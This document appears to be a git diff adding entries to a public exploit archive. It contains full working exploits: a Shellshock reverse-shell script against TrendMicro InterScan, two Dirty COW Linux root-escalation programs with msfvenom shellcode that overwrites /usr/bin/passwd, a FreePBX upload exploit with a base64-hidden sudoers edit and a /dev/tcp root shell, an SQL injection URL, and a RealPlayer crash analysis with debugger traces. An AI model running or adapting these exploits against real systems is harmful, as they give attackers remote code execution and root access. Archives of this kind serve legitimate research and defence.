+40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
+40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
+40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
diff --git a/platforms/hardware/remote/40619.py b/platforms/hardware/remote/40619.py
new file mode 100755
index 000000000..3646068ff
--- /dev/null
+++ b/platforms/hardware/remote/40619.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+# TrendMicro InterScan Web Security Virtul Appliance
+# ==================================================
+# InterScan Web Security is a software virtual appliance that 
+# dynamically protects against the ever-growing flood of web 
+# threats at the Internet gateway exclusively designed to secure 
+# you against traditional and emerging web threats at the Internet 
+# gateway. The appliance however is shipped with a vulnerable
+# version of Bash susceptible to shellshock (I know right?). An
+# attacker can exploit this vulnerability by calling the CGI
+# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
+# to perform arbitrary code execution. A limitation of this 
+# vulnerability is that the attacker must have credentials for
+# the admin web interface to exploit this flaw. The panel runs
+# over HTTP by default so a man-in-the-middle attack could be
+# used to gain credentials and compromise the appliance.
+# 
+# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
+# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
+# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
+# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
+# [-] exploiting shellshock CVE-2014-6271...
+# bash: no job control in this shell
+# bash-4.1$ id
+# uid=498(iscan) gid=499(iscan) groups=499(iscan)
+# 
+# -- Hacker Fantastic 
+#
+# (https://www.myhackerhouse.com)
+import SimpleHTTPServer
+import subprocess
+import requests
+import sys
+import os
+
+def spawn_listener():
+	os.system("nc -l 8080")
+
+def shellshock(ip,session,cbip):
+	user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
+	cookies = {'JSESSIONID': session}
+	print "[-] exploiting shellshock CVE-2014-6271..."
+	myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
+
+def login_http(ip,user,password):
+	mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
+	print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
+	myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)	
+	session_cookie = myreq.history[0].cookies.get('JSESSIONID')
+	print "[-] JSESSIONID = %s" % session_cookie 
+	return session_cookie
+
+if __name__ == "__main__":
+	print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
+	if len(sys.argv) < 5:
+		print "[-] use with <ip> <user> <pass> <connectback_ip>"
+		sys.exit()
+	newRef=os.fork()
+    	if newRef==0:
+		spawn_listener()
+    	else:
+		session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
+		shellshock(sys.argv[1],session,sys.argv[4])
diff --git a/platforms/linux/local/40611.c b/platforms/linux/local/40611.c
new file mode 100755
index 000000000..296d2e0d6
--- /dev/null
+++ b/platforms/linux/local/40611.c
@@ -0,0 +1,110 @@
+/*
+####################### dirtyc0w.c #######################
+$ sudo -s
+# echo this is not a test > foo
+# chmod 0404 foo
+$ ls -lah foo
+-r-----r-- 1 root root 19 Oct 20 15:23 foo
+$ cat foo
+this is not a test
+$ gcc -lpthread dirtyc0w.c -o dirtyc0w
+$ ./dirtyc0w foo m00000000000000000
+mmap 56123000
+madvise 0
+procselfmem 1800000000
+$ cat foo
+m00000000000000000
+####################### dirtyc0w.c #######################
+*/
+#include <stdio.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <string.h>
+ 
+void *map;
+int f;
+struct stat st;
+char *name;
+ 
+void *madviseThread(void *arg)
+{
+  char *str;
+  str=(char*)arg;
+  int i,c=0;
+  for(i=0;i<100000000;i++)
+  {
+/*
+You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
+> This is achieved by racing the madvise(MADV_DONTNEED) system call
+> while having the page of the executable mmapped in memory.
+*/
+    c+=madvise(map,100,MADV_DONTNEED);
+  }
+  printf("madvise %d\n\n",c);
+}
+ 
+void *procselfmemThread(void *arg)
+{
+  char *str;
+  str=(char*)arg;
+/*
+You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
+>  The in the wild exploit we are aware of doesn't work on Red Hat
+>  Enterprise Linux 5 and 6 out of the box because on one side of
+>  the race it writes to /proc/self/mem, but /proc/self/mem is not
+>  writable on Red Hat Enterprise Linux 5 and 6.
+*/
+  int f=open("/proc/self/mem",O_RDWR);
+  int i,c=0;
+  for(i=0;i<100000000;i++) {
+/*
+You have to reset the file pointer to the memory position.
+*/
+    lseek(f,map,SEEK_SET);
+    c+=write(f,str,strlen(str));
+  }
+  printf("procselfmem %d\n\n", c);
+}
+ 
+ 
+int main(int argc,char *argv[])
+{
+/*
+You have to pass two arguments. File and Contents.
+*/
+  if (argc<3)return 1;
+  pthread_t pth1,pth2;
+/*
+You have to open the file in read only mode.
+*/
+  f=open(argv[1],O_RDONLY);
+  fstat(f,&st);
+  name=argv[1];
+/*
+You have to use MAP_PRIVATE for copy-on-write mapping.
+> Create a private copy-on-write mapping.  Updates to the
+> mapping are not visible to other processes mapping the same
+> file, and are not carried through to the underlying file.  It
+> is unspecified whether changes made to the file after the
+> mmap() call are visible in the mapped region.
+*/
+/*
+You have to open with PROT_READ.
+*/
+  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+  printf("mmap %x\n\n",map);
+/*
+You have to do it on two threads.
+*/
+  pthread_create(&pth1,NULL,madviseThread,argv[1]);
+  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
+/*
+You have to wait for the threads to finish.
+*/
+  pthread_join(pth1,NULL);
+  pthread_join(pth2,NULL);
+  return 0;
+}
\ No newline at end of file
diff --git a/platforms/linux/local/40616.c b/platforms/linux/local/40616.c
new file mode 100755
index 000000000..00c93bcdc
--- /dev/null
+++ b/platforms/linux/local/40616.c
@@ -0,0 +1,156 @@
+/*
+* (un)comment correct payload first (x86 or x64)!
+* 
+* $ gcc cowroot.c -o cowroot -pthread
+* $ ./cowroot
+* DirtyCow root privilege escalation
+* Backing up /usr/bin/passwd.. to /tmp/bak
+* Size of binary: 57048
+* Racing, this may take a while..
+* /usr/bin/passwd is overwritten
+* Popping root shell.
+* Don't forget to restore /tmp/bak
+* thread stopped
+* thread stopped
+* root@box:/root/cow# id
+* uid=0(root) gid=1000(foo) groups=1000(foo)
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <string.h>
+#include <unistd.h>
+
+void *map;
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1,pth2,pth3;
+
+// change if no permissions to read
+char suid_binary[] = "/usr/bin/passwd";
+
+/*
+* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
+*/ 
+unsigned char sc[] = {
+  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
+  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
+  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
+  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
+  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
+};
+unsigned int sc_len = 177;
+
+/*
+* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
+unsigned char sc[] = {
+  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
+  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
+  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
+  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
+  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
+  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
+  0x89, 0xe1, 0xcd, 0x80
+};
+unsigned int sc_len = 136;
+*/
+
+void *madviseThread(void *arg)
+{
+    char *str;
+    str=(char*)arg;
+    int i,c=0;
+    for(i=0;i<1000000 && !stop;i++) {
+        c+=madvise(map,100,MADV_DONTNEED);
+    }
+    printf("thread stopped\n");
+}
+
+void *procselfmemThread(void *arg)
+{
+    char *str;
+    str=(char*)arg;
+    int f=open("/proc/self/mem",O_RDWR);
+    int i,c=0;
+    for(i=0;i<1000000 && !stop;i++) {
+        lseek(f,map,SEEK_SET);
+        c+=write(f, str, sc_len);
+    }
+    printf("thread stopped\n");
+}
+
+void *waitForWrite(void *arg) {
+    char buf[sc_len];
+
+    for(;;) {
+        FILE *fp = fopen(suid_binary, "rb");
+
+        fread(buf, sc_len, 1, fp);
+
+        if(memcmp(buf, sc, sc_len) == 0) {
+            printf("%s is overwritten\n", suid_binary);
+            break;
+        }
+
+        fclose(fp);
+        sleep(1);
+    }
+
+    stop = 1;
+
+    printf("Popping root shell.\n");
+    printf("Don't forget to restore /tmp/bak\n");
+
+    system(suid_binary);
+}
+
+int main(int argc,char *argv[]) {
+    char *backup;
+
+    printf("DirtyCow root privilege escalation\n");
+    printf("Backing up %s.. to /tmp/bak\n", suid_binary);
+
+    asprintf(&backup, "cp %s /tmp/bak", suid_binary);
+    system(backup);
+
+    f = open(suid_binary,O_RDONLY);
+    fstat(f,&st);
+
+    printf("Size of binary: %d\n", st.st_size);
+
+    char payload[st.st_size];
+    memset(payload, 0x90, st.st_size);
+    memcpy(payload, sc, sc_len+1);
+
+    map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+
+    printf("Racing, this may take a while..\n");
+
+    pthread_create(&pth1, NULL, &madviseThread, suid_binary);
+    pthread_create(&pth2, NULL, &procselfmemThread, payload);
+    pthread_create(&pth3, NULL, &waitForWrite, NULL);
+
+    pthread_join(pth3, NULL);
+
+    return 0;
+}
diff --git a/platforms/php/webapps/40612.txt b/platforms/php/webapps/40612.txt
new file mode 100755
index 000000000..982587818
--- /dev/null
+++ b/platforms/php/webapps/40612.txt
@@ -0,0 +1,12 @@
+# Exploit Title: SQL Injection in Just Dial Clone Script
+# Date: 20 October 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Vendor: http://www.i-netsolution.com/
+
+*----------------------------------------------------------------------------------------------------------------------*
+
+# Proof of Concept SQL Injection/Exploit :
+http://localhost/[PATH]/category-view-list.php?srch=PoC%27
+
+*----------------------------------------------------------------------------------------------------------------------*
diff --git a/platforms/php/webapps/40614.py b/platforms/php/webapps/40614.py
new file mode 100755
index 000000000..a9c34325a
--- /dev/null
+++ b/platforms/php/webapps/40614.py
@@ -0,0 +1,112 @@
+#!/usr/bin/env python
+'''
+    Title          |  FreePBX 13 Remote Command Execution and Privilege Escalation
+    Date           |  10/21/2016
+    Author         |  Christopher Davis 
+    Vendor         |  https://www.freepbx.org/
+    Version        |  FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)
+    Tested on      |  http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso 
+				      http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso
+    Purpose        |  This script exploits the freepbx website, elevates privileges and returns a reverse bind tcp as root
+    Usage          |  python pbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444 -s r
+	Orig Author    |  pgt - nullsecurity.net 
+'''
+import re
+import subprocess
+import argparse
+import random
+import time
+import socket
+import threading
+
+#This portion will check for requests and prompt user to install it if not already
+try:
+    import requests
+except:
+    try:
+        while True:
+            choice = raw_input('Requests library not found but is needed. Install? \'Y\'es or \'N\'o?\n:')
+            if choice.lower() == 'y':
+                subprocess.call('pip install requests',shell=True)
+                import requests
+                break
+            elif choice.lower() == 'n':
+                exit()
+            else:
+                continue
+    except Exception as e:
+        print(e)
+        exit()
+
+#Since subprocess.call will bind, we start this thread sepparate to execute after our netcat bind
+def delayGet():
+	global args
+	try:
+		time.sleep(5)
+		requests.get(args.url+ '0x4148.php.call', verify=False)
+	except:
+		pass
+
+if __name__ == '__main__':
+	try:
+		parser = argparse.ArgumentParser()
+		parser.add_argument('-u', type=str, help='hostname and path. Ex- http://192.168.1.1/path/', dest='url')
+		parser.add_argument('-l', type=str, help='localhost ip to listen on', dest='lhost')
+		parser.add_argument('-p', type=str, help='port to listen on', dest='lport')
+		parser.add_argument('-s', type=str, help="'L'ocal or 'R'oot shell attempt", dest='shell')
+		parser.add_help
+		args = parser.parse_args()
+
+		#Make sure args were passed
+		if args.url == None or args.lhost == None or args.lport == None or not bool(re.search(r'^(?:[L|l]|[r|R])$', args.shell)):
+			parser.print_help()
+			print("\nUsage:  python freepbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444")
+			exit()
+
+		#Make sure the http url is there
+		if bool(re.search('[hH][tT][tT][pP][sS]?\:\/\/', args.url)) == False:
+			print('There is something wrong with your url. It needs to have http:// or https://\n\n')
+			exit()
+
+		#make sure / is there, if not, put it there
+		if args.url[-1:] != '/':
+			args.url += '/'
+		#python -c 'import pty; pty.spawn("/bin/sh")'
+		#this is the php we will upload to get a reverse shell. System call to perform reverse bash shell. Nohup spawns a new process in case php dies
+
+		#if version 13, lets try to get root, otherwise
+		if args.shell.upper() == 'R':
+			cmdshell = '<?php fwrite(fopen("hackerWAShere.py","w+"),base64_decode("IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHRpbWUNCiMgLSotIGNvZGluZzogdXRmLTggLSotIA0KY21kID0gJ3NlZCAtaSBcJ3MvQ29tIEluYy4vQ29tIEluYy5cXG5lY2hvICJhc3RlcmlzayBBTEw9XChBTExcKVwgICcgXA0KCSdOT1BBU1NXRFw6QUxMIlw+XD5cL2V0Y1wvc3Vkb2Vycy9nXCcgL3Zhci9saWIvJyBcDQoJJ2FzdGVyaXNrL2Jpbi9mcmVlcGJ4X2VuZ2luZScNCnN1YnByb2Nlc3MuY2FsbChjbWQsIHNoZWxsPVRydWUpDQpzdWJwcm9jZXNzLmNhbGwoJ2VjaG8gYSA+IC92YXIvc3Bvb2wvYXN0ZXJpc2svc3lzYWRtaW4vYW1wb3J0YWxfcmVzdGFydCcsIHNoZWxsPVRydWUpDQp0aW1lLnNsZWVwKDIwKQ==")); system("python hackerWAShere.py; nohup sudo bash -i >& /dev/tcp/'+args.lhost+'/'+args.lport+' 0>&1 ");?>'
+		else:
+			cmdshell = "<?php system('nohup bash -i >& /dev/tcp/"+args.lhost+"/"+args.lport+" 0>&1 ');?>"
+		
+		#creates a session
+		session = requests.Session()
+		print('\nStarting Session')
+		session.get(args.url, verify=False)
+		print('\nScraping the site for a cookie')
+		HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0", "Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language":"en-US,en;q=0.5","Referer": args.url + 'admin/ajax.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'}
+		print('\nPosting evil php')
+		postData = {'module':'hotelwakeup','command':'savecall','day':'now','time':'+1 week','destination':"/../../../../../../var/www/html/0x4148.php","language":cmdshell}
+		result = session.post(args.url + 'admin/ajax.php', headers=HEADERS, data=postData, verify=False)
+		if 'Whoops' not in result.text:
+			print(result.text)
+			print('\nSomething Went wrong. Was expecting a Whoops but none found.')
+			exit()
+		#calls the get thread which will execute 5 seconds after the netcat bind
+
+		print('\nStarting new thread for getting evil php')
+		z = threading.Thread(target=delayGet)
+		z.daemon = True
+		z.start()
+
+		print('\nBinding to socket '+ args.lport + ' Please wait... May take 30 secs to get call back.\n')
+		#This binds our terminal with netcat and waits for the call back
+		try:
+			subprocess.call('nc -nvlp '+args.lport, shell=True)
+		except Exception as e:
+			print(e)
+		print('\nIf you saw the message "sudo: no tty present and no askpass program specified", please try again and it may work.')
+	except Exception as e:
+		print(e)
+		print('\nSee above error')
diff --git a/platforms/windows/dos/40617.txt b/platforms/windows/dos/40617.txt
new file mode 100755
index 000000000..65aa165cb
--- /dev/null
+++ b/platforms/windows/dos/40617.txt
@@ -0,0 +1,200 @@
+Tested on: Win7 / Win10 x64
+
+Date: October 20th 2016
+
+Vendor homepage: http://www.real.com
+
+Software link: http://realplayer-download.real.com/free/windows/installer/stubinst/stub/rt1/T10EUDRP/RealTimes-RealPlayer.exe
+
+File version (both realplay.exe and qcpfformat.dll):  18.1.5.705
+
+Exploit author: Alwin Peppels
+
+Found with: Peach Fuzzer
+
+Context:
+
+eax=00000002 ebx=00000000 ecx=0d4cb9a0 edx=00000000 esi=00000000 edi=046abd0c
+eip=534013dc esp=00d7e254 ebp=00d7e254 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+qcpfformat+0x13dc:
+534013dc 0fb64203        movzx   eax,byte ptr [edx+3]       ds:002b:00000003=??
+
+
+Call stack:
+ # ChildEBP RetAddr  Args to Child             
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 00d7e254 53401e92 00000000 00000000 0d4cb9a0 qcpfformat+0x13dc
+01 00d7e2a4 53403342 046abd0c 80004005 00000000 qcpfformat+0x1e92
+02 00d7e2d8 53402d37 1d26bbf0 74617276 534018a9 qcpfformat!RMACreateInstance+0xc62
+03 00d7e308 534030cb 046abd0c 00000000 74617276 qcpfformat!RMACreateInstance+0x657
+04 00d7e328 533e20f0 1ee51040 00000000 00000008 qcpfformat!RMACreateInstance+0x9eb
+05 00d7e348 533e1da6 00000008 00d7e370 00000005 smplfsys+0x20f0
+06 00d7e374 533e3582 00d7e394 00000000 00000000 smplfsys+0x1da6
+07 00d7e38c 5340349f 00000000 00000008 00000000 smplfsys+0x3582
+08 00d7e3b4 533e3cd9 00d7e3d0 0d4cb9a4 0d4cb9a4 qcpfformat!RMACreateInstance+0xdbf
+09 00d7e3c8 53403597 00000000 00000000 00000000 smplfsys+0x3cd9
+0a 00d7e444 533e283c 1d26bbf8 0d4cb9a4 0d4cb9a0 qcpfformat!RMACreateInstance+0xeb7
+0b 00d7e460 53402c51 1d26bbf0 00000005 0d4cb9a0 smplfsys+0x283c
+0c 00d7e488 57a8a692 1d190950 0ce86fd8 1d26bd48 qcpfformat!RMACreateInstance+0x571
+0d 00d7e4f0 57a8adfd 0d49dd78 5865cb7c 00d7e528 mametadata!SetDLLAccessPath+0x18392
+0e 00d7e568 585afd7c 0d4aca0c 046a2610 5865cb7c mametadata!SetDLLAccessPath+0x18afd
+0f 00d7e5ac 585af1d0 1d26c088 00d7e5fc 00000000 rpcl3260!RMAShutdown+0x2584c
+10 00d7e5c0 585ae90a 00000000 1d26c088 03ecd74c rpcl3260!RMAShutdown+0x24ca0
+11 00d7e5d8 57c788ba 1d26c088 00d7e5fc 03ecd74c rpcl3260!RMAShutdown+0x243da
+12 00d7e608 57c38009 1d26c088 00000002 1d26c088 rpmn3260!SetDLLAccessPath+0x58b1a
+13 00d7e628 585bc25e 1d26c088 1d26c088 00000000 rpmn3260!SetDLLAccessPath+0x18269
+
+
+Disassembly:
+
+qcpfformat+0x13d0:
+534013d0 55              push    ebp
+534013d1 8bec            mov     ebp,esp
+534013d3 83794000        cmp     dword ptr [ecx+40h],0
+534013d7 8b5508          mov     edx,dword ptr [ebp+8]
+534013da 7422            je      qcpfformat+0x13fe (534013fe)
+534013dc 0fb64203        movzx   eax,byte ptr [edx+3]
+534013e0 0fb64a02        movzx   ecx,byte ptr [edx+2]
+534013e4 c1e008          shl     eax,8
+
+
+
+The edx register is being zeroed out by the move from ebp+8 at +13d7, causing the memory read at instruction 13dc to point to 0x00000003
+
+In the analysis below the PoC files place in memory starts at 0b880012
+
+Here the first VRAT tag (hex 76 72 61 74) is read in correctly the first time from 0b881044. As can be seen in the instructions above that, on the first iteration EBP is pointing at the  tags but is quickly set to an address outside the file.
+
+
+Breakpoint 1 hit
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d0 esp=00bce58c ebp=0b881040 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+qcpfformat+0x13d0:
+54cd13d0 55              push    ebp
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d1 esp=00bce588 ebp=0b881040 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+qcpfformat+0x13d1:
+54cd13d1 8bec            mov     ebp,esp
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d3 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+qcpfformat+0x13d3:
+54cd13d3 83794000        cmp     dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d7 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13d7:
+54cd13d7 8b5508          mov     edx,dword ptr [ebp+8] ss:002b:00bce590=0b881044
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13da esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13da:
+54cd13da 7422            je      qcpfformat+0x13fe (54cd13fe)            [br=0]
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13dc esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+
+qcpfformat+0x13dc:
+54cd13dc 0fb64203        movzx   eax,byte ptr [edx+3]       ds:002b:0b881047=74
+0:000> t
+eax=00000074 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e0 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13e0:
+54cd13e0 0fb64a02        movzx   ecx,byte ptr [edx+2]       ds:002b:0b881046=61
+0:000> t
+eax=00000074 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e4 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13e4:
+54cd13e4 c1e008          shl     eax,8
+0:000> t
+eax=00007400 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e7 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
+qcpfformat+0x13e7:
+54cd13e7 0bc1            or      eax,ecx
+0:000> t
+eax=00007461 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e9 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13e9:
+54cd13e9 0fb64a01        movzx   ecx,byte ptr [edx+1]       ds:002b:0b881045=72
+0:000> t
+eax=00007461 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13ed esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13ed:
+54cd13ed c1e008          shl     eax,8
+0:000> t
+eax=00746100 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13f0 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
+qcpfformat+0x13f0:
+54cd13f0 0bc1            or      eax,ecx
+0:000> t
+eax=00746172 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13f2 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
+qcpfformat+0x13f2:
+54cd13f2 0fb60a          movzx   ecx,byte ptr [edx]         ds:002b:0b881044=76
+0:000> t
+eax=00746172 ebx=00bce5e8 ecx=00000076 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13f5 esp=00bce588 ebp=00bce588 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
+qcpfformat+0x13f5:
+54cd13f5 c1e008          shl     eax,8
+
+
+
+So now both ESP and EBP are pointing outside the source file, causing the next iteration to read NULL into EDX, setting up the access violation:
+
+
+
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d0 esp=00bce4d0 ebp=00bce51c iopl=0         nv up ei ng nz ac po cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
+qcpfformat+0x13d0:
+54cd13d0 55              push    ebp
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d1 esp=00bce4cc ebp=00bce51c iopl=0         nv up ei ng nz ac po cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
+qcpfformat+0x13d1:
+54cd13d1 8bec            mov     ebp,esp
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d3 esp=00bce4cc ebp=00bce4cc iopl=0         nv up ei ng nz ac po cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000293
+qcpfformat+0x13d3:
